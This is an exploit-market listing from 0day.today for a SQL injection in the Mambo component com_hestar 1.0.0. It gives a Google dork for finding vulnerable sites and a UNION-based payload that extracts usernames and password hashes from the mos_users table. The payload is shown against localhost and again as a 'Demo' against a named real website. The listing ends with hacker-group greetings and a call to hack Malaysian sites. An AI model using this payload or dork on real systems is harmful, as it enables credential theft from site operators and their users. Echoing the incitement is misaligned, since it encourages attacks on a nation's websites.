[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Mambo Component com_hestar Remote SQL Injection Vulnerability

Author
M3NW5
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5742
Category
web applications
Date add
08-09-2009
Platform
unsorted
=============================================================
Mambo Component com_hestar Remote SQL Injection Vulnerability
=============================================================



#####################################################################################################
## ------------------------------------------------------------------------------------------------------- ##
## _______            __                              __                 ______            __              ##
##|_     _|.-----..--|  |.-----..-----..-----..-----.|__|.---.-..-----. |      |.-----..--|  |.-----..----.##
## _|   |_ |     ||  _  ||  _  ||     ||  -__||__ --||  ||  _  ||     | |   ---||  _  ||  _  ||  -__||   _|##
##|_______||__|__||_____||_____||__|__||_____||_____||__||___._||__|__| |______||_____||_____||_____||__|  ##
##													   ##
## ------------------------------------------------------------------------------------------------------- ##
#############################################################################################################

[ Software Information ]

[+] Software      : com_hestar
[+] Version	  : 1.0.0
[+] Vulnerability : SQL injection
[+] Google Dork   : inurl:"com_hestar"

#############################################################################################################
[ POC ]

http://127.0.0.1/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--


[ Demo ]

http://www.arbae.is/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--
#############################################################################################################

[ Greetings ]

[+] All of Indonesian Coder Member, Don Tukulesto, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, TUCKER, Petrucii, Chercut,
    Senot, Joker, Rebel, Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d
[+] All of Surabayahackerlink Member, Awan, Plaque, rey_cute, Tuex, XNITRO, DraCoola.com
[+] ServerIsDown.org, Jack-, Yadoy666, kecemplungkalen, xshadow, H4ck3rKu
[+] Kill-9 Crew, kaMtiEz, Arianom

[ SHOUT ]

STILL FVCKED TO MALAYSIA, TRULLY THIEF COUNTRY IN ASIA.
Let's Hack Malaysian site. PROUD TO BE INDONESIAN !!!!!

[ Special to ]

Anggie Lestari Putri sulung dari keluarga bapak dodi dan ibu dini ^^ i lope yu pull...



#  0day.today [2024-12-24]  #